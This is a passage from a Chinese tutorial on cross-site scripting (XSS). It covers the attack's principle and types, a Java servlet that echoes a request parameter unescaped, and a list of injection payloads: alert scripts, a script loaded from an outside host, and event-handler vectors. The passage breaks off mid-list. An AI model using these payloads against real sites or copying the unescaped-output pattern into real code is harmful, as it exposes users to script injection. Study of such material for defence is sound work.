![1bf52c1fc90bba9815e5a1970e8888b0.png](https://img-blog.csdnimg.cn/img_convert/1bf52c1fc90bba9815e5a1970e8888b0.png)
xss原理
跨站脚本攻击(Cross Site Scripting),缩写为XSS。恶意攻击者往Web页面里插入恶意javaScript代码,当用户浏览该页之时,嵌入其中Web里面的javaScript代码会被执行,从而达到恶意攻击用户的目的。
xss分类
- 反射型
- 存储型
- DOM型
xss场景和防御
1. 恶意数据出现在标签内
<body>
...恶意数据
</body>
漏洞代码
String parameter = request.getParameter("xss");
response.getWriter().write("<body>"+parameter+"</body>");
攻击payload
攻击者可以使用的payload(以下每个种类列出代表性的一个)如下:
(1) js类
<script>alert(/xss/);</script>
<script src="http://www.test.com/exploit.js" ></script>
<script src="data:text/javascript,alert(1)"></script>
(2)事件类
<img src=1 onerror="javascript:alert(1)"></img>
<svg/onload=%26%23097lert%26lpar;1337)>
(3) 特殊属性类
<script src="